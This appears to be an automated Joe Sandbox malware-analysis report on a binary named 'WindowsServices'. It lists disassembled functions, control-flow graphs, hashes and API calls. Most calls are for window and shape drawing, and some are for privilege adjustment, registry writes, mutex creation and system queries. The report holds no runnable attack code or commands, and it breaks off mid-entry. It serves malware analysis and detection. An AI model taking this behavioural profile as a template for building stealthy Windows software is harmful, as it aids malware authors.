                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1221 404ec0-404ef6 CopyRect call 403c20 1224 404f06-404f28 CopyRect call 403c20 1221->1224 1225 404ef8-404f03 1221->1225 1228 404f38-404f5a CopyRect call 403c20 1224->1228 1229 404f2a-404f35 1224->1229 1232 404f6a-404f8c CopyRect call 403c20 1228->1232 1233 404f5c-404f67 1228->1233 1236 404f9c-404fbe CopyRect call 403c20 1232->1236 1237 404f8e-404f99 1232->1237 1240 404fc0-404fcb 1236->1240 1241 404fce-404ff0 CopyRect call 403c20 1236->1241 1244 405000-405022 CopyRect call 403c20 1241->1244 1245 404ff2-404ffd 1241->1245 1248 405032-405054 CopyRect call 403c20 1244->1248 1249 405024-40502f 1244->1249 1252 405064-405086 CopyRect call 403c20 1248->1252 1253 405056-405061 1248->1253 1256 405096-4050b8 CopyRect call 403c20 1252->1256 1257 405088-405093 1252->1257 1260 4050c8-4050ea CopyRect call 403c20 1256->1260 1261 4050ba-4050c5 1256->1261 1264 4050fa-40511c CopyRect call 403c20 1260->1264 1265 4050ec-4050f7 1260->1265 1268 40512c-40514e CopyRect call 403c20 1264->1268 1269 40511e-405129 1264->1269 1272 405150-40515b 1268->1272 1273 40515e-405180 CopyRect call 403c20 1268->1273 1276 405190-4051b2 CopyRect call 403c20 1273->1276 1277 405182-40518d 1273->1277 1280 4051c2-4051e4 CopyRect call 403c20 1276->1280 1281 4051b4-4051bf 1276->1281 1284 4051f4-405216 CopyRect call 403c20 1280->1284 1285 4051e6-4051f1 1280->1285 1288 405226-405248 CopyRect call 403c20 1284->1288 1289 405218-405223 1284->1289 1292 405258-40527a CopyRect call 403c20 1288->1292 1293 40524a-405255 1288->1293 1296 40528a-4052b7 CopyRect call 403c20 1292->1296 1297 40527c-405287 1292->1297
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1349 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1352 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1349->1352 1353 40b186-40b191 __setusermatherr 1349->1353 1356 40b225-40b228 1352->1356 1357 40b1eb-40b1f3 1352->1357 1353->1352 1358 40b202-40b206 1356->1358 1359 40b22a-40b22e 1356->1359 1360 40b1f5-40b1f7 1357->1360 1361 40b1f9-40b1fc 1357->1361 1363 40b208-40b20a 1358->1363 1364 40b20c-40b21d GetStartupInfoA 1358->1364 1359->1356 1360->1357 1360->1361 1361->1358 1362 40b1fe-40b1ff 1361->1362 1362->1358 1363->1362 1363->1364 1365 40b230-40b232 1364->1365 1366 40b21f-40b223 1364->1366 1367 40b233-40b23e GetModuleHandleA call 40b2a2 1365->1367 1366->1367 1369 40b243-40b260 exit _XcptFilter 1367->1369
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1370 404360-4044a9 call 4048b0 call 40adf6 call 40adf0 call 40adea 1379 404552-40455e 1370->1379 1380 4044af-4044b1 1370->1380 1381 404560-404572 CreatePolygonRgn call 40ae02 1379->1381 1382 4045cb-4045d4 CreatePolygonRgn call 40ae02 1379->1382 1380->1379 1383 4044b7-4044bd 1380->1383 1391 404574-404576 1381->1391 1392 404578 1381->1392 1388 4045d9-4045db 1382->1388 1383->1379 1386 4044c3-4044c7 1383->1386 1389 4044cd-4044e3 1386->1389 1390 40454e 1386->1390 1393 4045e6-404667 call 40adcc * 4 1388->1393 1394 4045dd-4045e3 call 40add2 1388->1394 1395 4044e9-404548 _ftol * 2 1389->1395 1390->1379 1397 40457b-4045c9 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1391->1397 1392->1397 1394->1393 1395->1395 1399 40454a-40454c 1395->1399 1397->1388 1399->1390
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1410 403e10-403f48 call 4048b0 * 2 call 40adf6 call 40adf0 call 40adea 1421 403fd1-403fdd 1410->1421 1422 403f4e-403f50 1410->1422 1424 40404a-404053 CreatePolygonRgn call 40ae02 1421->1424 1425 403fdf-403ff1 CreatePolygonRgn call 40ae02 1421->1425 1422->1421 1423 403f52-403f56 1422->1423 1423->1421 1426 403f58-403f6e 1423->1426 1431 404058-40405a 1424->1431 1435 403ff3-403ff5 1425->1435 1436 403ff7 1425->1436 1429 403f74-403fcb _ftol * 2 1426->1429 1429->1429 1434 403fcd-403fcf 1429->1434 1432 404065-4040e6 call 40adcc * 4 1431->1432 1433 40405c-404062 call 40add2 1431->1433 1433->1432 1434->1421 1439 403ffa-404048 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1435->1439 1436->1439 1439->1431
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00409EBE
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 1654611898-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1505 40a940-40a999 GetWindowRect 1506 40aa54-40aa7e ClientToScreen call 40b08a 1505->1506 1507 40a99f-40a9a0 1505->1507 1509 40aa83-40aabc call 40adcc 1506->1509 1507->1509 1510 40a9a6-40a9a8 1507->1510 1511 40a9b2-40a9e6 call 4052c0 _ftol 1510->1511 1512 40a9aa-40a9ac 1510->1512 1511->1509 1517 40a9ec-40a9f1 1511->1517 1512->1509 1512->1511 1517->1509 1518 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1517->1518 1525 40aa4d call 40a440 1518->1525 1526 40aa52 1525->1526 1526->1509
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:18.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:35
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 834 b3a893 835 b3a89d AdjustTokenPrivileges 834->835 837 b3a91b 835->837 838 b3ab92 840 b3abc6 CreateMutexW 838->840 841 b3ac41 840->841 842 b3aa15 844 b3aa46 NtQuerySystemInformation 842->844 845 b3aa90 844->845 846 b3a67b 847 b3a6ae LookupPrivilegeValueW 846->847 849 b3a6fe 847->849 806 b3a602 807 b3a62e FindCloseChangeNotification 806->807 808 b3a66d 806->808 809 b3a63c 807->809 808->807 850 b3a462 852 b3a486 RegSetValueExW 850->852 853 b3a507 852->853 854 b3a361 855 b3a392 RegQueryValueExW 854->855 857 b3a41b 855->857 814 b3abc6 816 b3abfe CreateMutexW 814->816 817 b3ac41 816->817 818 b3aa46 819 b3aaa6 818->819 820 b3aa7b NtQuerySystemInformation 818->820 819->820 821 b3aa90 820->821 862 b3a5e4 865 b3a602 FindCloseChangeNotification 862->865 864 b3a63c 865->864 826 b3a8ca 827 b3a8f9 AdjustTokenPrivileges 826->827 829 b3a91b 827->829

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00FC067F 1 Function_04D30BD0 2 Function_00B32430 3 Function_04D308D5 4 Function_04D311D5 5 Function_00B322B4 6 Function_00FC0074 7 Function_04D306DB 8 Function_00B3A73F 9 Function_00B3A0BE 10 Function_00B3A23C 11 Function_04D30A5C 12 Function_00B323BC 13 Function_00B3213C 14 Function_00FC026D 15 Function_00FC066A 16 Function_00FC05E1 17 Function_00B3A6AE 18 Function_00B3A02E 19 Function_00B3A893 20 Function_00B3A392 21 Function_00B3A812 22 Function_00B3AB92 23 Function_04D30971 24 Function_00B32310 25 Function_00B3AA15 26 Function_04D30FF5 27 Function_00B32194 28 Function_00B3A99A 29 Function_04D30278 67 Function_04D30C30 29->67 30 Function_04D30AF8 31 Function_00B32098 32 Function_00FC05D0 33 Function_00B3A602 34 Function_00FC0648 34->15 35 Function_00B3A486 36 Function_00B3A186 37 Function_00B32006 38 Function_00B3A005 39 Function_04D30268 39->67 40 Function_04D313E8 41 Function_00FC05C0 42 Function_00FC0740 43 Function_00B3A20C 44 Function_04D30392 45 Function_04D30C10 46 Function_00B321F0 47 Function_00B3A776 48 Function_00B323F4 49 Function_00B3A67B 50 Function_00B3A078 51 Function_00B3A2FE 52 Function_00B3247D 53 Function_00B3A462 54 Function_00B3A361 55 Function_00B3A960 56 Function_04D30080 57 Function_04D30007 57->16 57->29 57->39 57->44 83 Function_00FC0606 57->83 84 Function_04D30429 57->84 58 Function_00B3A5E4 59 Function_00B32264 60 Function_00B32364 61 Function_00B3A56E 62 Function_00B3AAEE 63 Function_00B3A7EC 64 Function_00B3A2D2 65 Function_00B3A5D1 66 Function_00B3A751 68 Function_00B320D0 69 Function_00B32458 70 Function_00B3A25E 71 Function_00FC0711 72 Function_04D30B3E 73 Function_00B3A45C 74 Function_00B3A140 75 Function_00B3A540 76 Function_00B3AAC0 77 Function_00B3ABC6 78 Function_00B3AA46 79 Function_00FC000A 80 Function_00B324C5 81 Function_00B32044 82 Function_00B3A8CA 85 Function_04D30729 86 Function_00FC0001

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 b3a893-b3a8f7 292 b3a8f9 288->292 293 b3a8fc-b3a90b 288->293 292->293 294 b3a94e-b3a953 293->294 295 b3a90d-b3a92d AdjustTokenPrivileges 293->295 294->295 298 b3a955-b3a95a 295->298 299 b3a92f-b3a94b 295->299 298->299
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B3A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: b4f7723548be4f49b9b94fd31ab79ae34ad0ac4e991f7eecdda88dab381cbdcb
                                                                        • Instruction ID: 9d43aed0f1d7ccb1ec055d8b3dabbd65b09b0eeb555afcef98b4250c5b19b797
                                                                        • Opcode Fuzzy Hash: b4f7723548be4f49b9b94fd31ab79ae34ad0ac4e991f7eecdda88dab381cbdcb
                                                                        • Instruction Fuzzy Hash: 6421E2765093809FDB238F25DC44B52BFF4EF06310F1985DAE9858F563D270A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 368 b3aa15-b3aa79 370 b3aaa6-b3aaab 368->370 371 b3aa7b-b3aa8e NtQuerySystemInformation 368->371 370->371 372 b3aa90-b3aaa3 371->372 373 b3aaad-b3aab2 371->373 373->372
                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B3AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 55c1b03e02f7d8a3ece76b9a5c935d242a18bbc4d55b3bcb2cb8d1b6c98fea5a
                                                                        • Instruction ID: 6fb92a80d4cfce670d38a2ef03db1d43a01fb0919b06c7b22cd8a116ff6856c4
                                                                        • Opcode Fuzzy Hash: 55c1b03e02f7d8a3ece76b9a5c935d242a18bbc4d55b3bcb2cb8d1b6c98fea5a
                                                                        • Instruction Fuzzy Hash: 0C11DD724093C09FDB228F10DC44A92FFF4EF06324F0984CAED848B663D275A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B3A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 596ecdd146a494e9e30f4ee640d43eeb6f6d88c01057724a19366ffa646d8c9b
                                                                        • Instruction ID: b45ab6bb710bf644d5dbf8e83af3ee1ae784c3cc5ab6c256354a94d5d9c5c5ab
                                                                        • Opcode Fuzzy Hash: 596ecdd146a494e9e30f4ee640d43eeb6f6d88c01057724a19366ffa646d8c9b
                                                                        • Instruction Fuzzy Hash: 1811A0766003049FDB20CF55DD88B52FBE4EF04320F2885AADD858BA52D331E818DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B3AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
